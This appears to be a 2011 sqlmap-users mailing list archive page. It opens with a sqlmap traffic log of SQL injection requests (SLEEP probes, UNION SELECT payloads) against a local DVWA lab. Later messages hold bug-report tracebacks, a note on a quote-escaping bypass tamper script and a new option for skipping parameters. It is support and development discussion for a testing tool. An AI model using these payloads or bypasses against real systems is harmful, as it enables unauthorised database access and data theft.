onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#11]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#11] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#12]: GET /vulnerabilities/sqli/?id=test%27%3B%20SELECT%20SLEEP%285%29%3B%20%23&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#12] (200 OK): Content-length: 176 X-powered-by: PHP/5.3.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test%27%3B%20SELECT%20SLEEP%285%29%3B%20%23&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html <pre>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT SLEEP(5); #'' at line 1</pre> ############################################################################ HTTP request [#13]: GET /vulnerabilities/sqli/?id=test%27%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C121%2C98%2C120%2C58%29%2CCHAR%2898%2C80%2C98%2C101%2C105%2C111%2C119%2C69%2C84%2C107%29%2CCHAR%2858%2C104%2C120%2C106%2C58%29%29%20%23&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#13] (200 OK): Content-length: 4523 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test%27%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C121%2C98%2C120%2C58%29%2CCHAR%2898%2C80%2C98%2C101%2C105%2C111%2C119%2C69%2C84%2C107%29%2CCHAR%2858%2C104%2C120%2C106%2C58%29%29%20%23&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> <pre>ID: test' UNION ALL SELECT NULL, CONCAT(CHAR(58,121,98,120,58),CHAR(98,80,98,101,105,111,119,69,84,107),CHAR(58,104,120,106,58)) #<br>First name: <br>Surname: :ybx:bPbeiowETk:hxj:</pre> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/... [truncated message content] |
|
From: <ks...@so...> - 2011-09-04 11:45:27
|
hello dear sqlmap-users!
recently i got this error:
[01:00:31] [WARNING] HTTP error codes detected during testing:
400 (Bad Request) - 50 times
[01:00:31] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4370), retry
your run with the latest development version from the Subversion
repository. If the exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the
bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4370)
Python version: 2.6.6
Operating system: posix
Command line: sqlmap.py -m urls.txt --batch --privileges --random-agent
Technique: BOOLEAN
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
File "sqlmap.py", line 86, in main
start()
File "/mnt/1/sqlmap/sqlmap-dev/lib/controller/controller.py", line 577,
in start
action()
File "/mnt/1/sqlmap/sqlmap-dev/lib/controller/action.py", line 81, in
action
conf.dbmsHandler.getPrivileges(), "privilege")
File "/mnt/1/sqlmap/sqlmap-dev/plugins/generic/enumeration.py", line
548, in getPrivileges
users = self.getUsers()
File "/mnt/1/sqlmap/sqlmap-dev/plugins/generic/enumeration.py", line
208, in getUsers
indexRange = getRange(count, plusOne=plusOne)
File "/mnt/1/sqlmap/sqlmap-dev/lib/core/common.py", line 1328, in getRange
indexRange = range(limitStart - 1, limitStop)
OverflowError: range() result has too many items
[*] shutting down at 01:00:31
cheers!
|
|
From: Miroslav S. <mir...@gm...> - 2011-08-30 09:10:15
|
hi "root". thing is that in your case for some reason query used for counting number of columns (prior to their dumping) "COUNT(*) FROM ..." has not been working properly as it should. there are various possible reasons for that: 1) there is some kind of WAF involved dropping all those "suspicious" requests, 2) information_schema (like) table is missing, 3) sqlmap is wrong for some reason. you can send me a -t traffic.txt file and i could take a look if you want. kind regards On Tue, Aug 30, 2011 at 5:03 AM, root <ro...@cn...> wrote: > hi > when is try to get db data.and the sqlmap say's > "unable to retrieve the number of columns" > what mean of this erorr ?why this.. > > > > 2011-08-30 > ________________________________ > thks&Best Regards > robert > ------------------------------------------------------------------------------ > Special Offer -- Download ArcSight Logger for FREE! > Finally, a world-class log management solution at an even better > price-free! And you'll get a free "Love Thy Logs" t-shirt when you > download Logger. Secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsisghtdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: root <ro...@cn...> - 2011-08-30 03:03:24
|
hi when is try to get db data.and the sqlmap say's "unable to retrieve the number of columns" what mean of this erorr ?why this.. 2011-08-30 thks&Best Regards robert |
|
From: <ks...@so...> - 2011-08-29 18:36:28
|
hello kids!
recently got this bug
-------------
[19:58:45] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4358), retry
your run with the latest development version from the Subversion
repository. If the exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the
bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4358)
Python version: 2.6.6
Operating system: posix
Command line: sqlmap.py -m urls.txt --batch --privileges --random-agent
Technique: UNION
Back-end DBMS: Microsoft SQL Server (identified)
Traceback (most recent call last):
File "sqlmap.py", line 86, in main
start()
File "/mnt/1/sqlmap/sqlmap-dev/lib/controller/controller.py", line 460,
in start
injection = checkSqlInjection(place, parameter, value)
File "/mnt/1/sqlmap/sqlmap-dev/lib/controller/checks.py", line 408, in
checkSqlInjection
reqPayload, vector = unionTest(comment, place, parameter, value,
prefix, suffix)
File "/mnt/1/sqlmap/sqlmap-dev/lib/techniques/union/test.py", line 290,
in unionTest
validPayload, vector = __unionTestByCharBruteforce(comment, place,
parameter, value, prefix, suffix)
File "/mnt/1/sqlmap/sqlmap-dev/lib/techniques/union/test.py", line 257,
in __unionTestByCharBruteforce
count = __findUnionCharCount(comment, place, parameter, value, prefix,
suffix)
File "/mnt/1/sqlmap/sqlmap-dev/lib/techniques/union/test.py", line 150,
in __findUnionCharCount
if not re.search(r'>\s*%s\s*<' % kb.uChar, page):
File "/usr/lib/python2.6/re.py", line 142, in search
return _compile(pattern, flags).search(string)
TypeError: expected string or buffer
---------------
system - debian.
Use proxychain to divert sqlmap traffic to socks.
(http://proxychains.sourceforge.net/)
when socks die i got this exeption.
cheers.
|
|
From: Miroslav S. <mir...@gm...> - 2011-08-29 15:37:32
|
Hi all. This moment I've added "unmagicquotes.py" tampering script as requested by Mohamed Ramadan Reference for the logic itself can be found here: http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string Kind regards p.s. remember, this only should work only against GBK/Big5 backend character sets -- Miroslav Stampar http://about.me/stamparm |
|
From: Andres T. A. <ata...@gm...> - 2011-08-29 15:17:56
|
Thanks for those great improvements. Andres El 29 de agosto de 2011 15:41, Miroslav Stampar <mir...@gm...>escribió: > hi again. > > with the last commit r4369 new switch "--skip" is added. > > e.g. --skip=ua > or > e.g. --skip=random-agent > or > e.g. --skip="ua,random-agent,id,id2" > > will make sqlmap explicit skip the testing of parameters provided this way > > kind regards > > 2011/8/20 Andres Tarascó Acuña <ata...@gm...>: > > hi there! > > > > I would like to suggest a feature that I think many of you will find it > > useful. The idea is to allow sqlmap or an sqlmap tamper script to create > > random data on each request, against targeted parameters, to bypass > unique > > key restrictions. afaik there is no way to achieve this with latest > > release. > > > > For example, a registration form, can trigger an sql injection that can > only > > be exploited when some previous checks are bypassed, like some parameters > > being inserted into the database. Under these scenario, each request > must > > contain unique data on some parameters to be able to attack the backend. > > > > Several "random data" generator could be supported, like > > integers,alphanumeric , and emails strings. > > Example: > > ./sqlmap.py -u http://host/register.php > > --data="login=a@a.com&pass=f00&lang=en" -p lang --random-email=login > > Its just an idea :) > > btw, without using the -p flag to target an specific parameter, is there > any > > way to tell sqlmap to avoid testing a parameter? > > > > Thanks, > > > > Andres > > > > > ------------------------------------------------------------------------------ > > Get a FREE DOWNLOAD! and learn more about uberSVN rich system, > > user administration capabilities and model configuration. Take > > the hassle out of deploying and managing Subversion and the > > tools developers use with it. http://p.sf.net/sfu/wandisco-d2d-2 > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > |
|
From: Miroslav S. <mir...@gm...> - 2011-08-29 13:41:59
|
hi again. with the last commit r4369 new switch "--skip" is added. e.g. --skip=ua or e.g. --skip=random-agent or e.g. --skip="ua,random-agent,id,id2" will make sqlmap explicit skip the testing of parameters provided this way kind regards 2011/8/20 Andres Tarascó Acuña <ata...@gm...>: > hi there! > > I would like to suggest a feature that I think many of you will find it > useful. The idea is to allow sqlmap or an sqlmap tamper script to create > random data on each request, against targeted parameters, to bypass unique > key restrictions. afaik there is no way to achieve this with latest > release. > > For example, a registration form, can trigger an sql injection that can only > be exploited when some previous checks are bypassed, like some parameters > being inserted into the database. Under these scenario, each request must > contain unique data on some parameters to be able to attack the backend. > > Several "random data" generator could be supported, like > integers,alphanumeric , and emails strings. > Example: > ./sqlmap.py -u http://host/register.php > --data="login=a@a.com&pass=f00&lang=en" -p lang --random-email=login > Its just an idea :) > btw, without using the -p flag to target an specific parameter, is there any > way to tell sqlmap to avoid testing a parameter? > > Thanks, > > Andres > > ------------------------------------------------------------------------------ > Get a FREE DOWNLOAD! and learn more about uberSVN rich system, > user administration capabilities and model configuration. Take > the hassle out of deploying and managing Subversion and the > tools developers use with it. http://p.sf.net/sfu/wandisco-d2d-2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
48 messages has been excluded from this view by a project administrator.
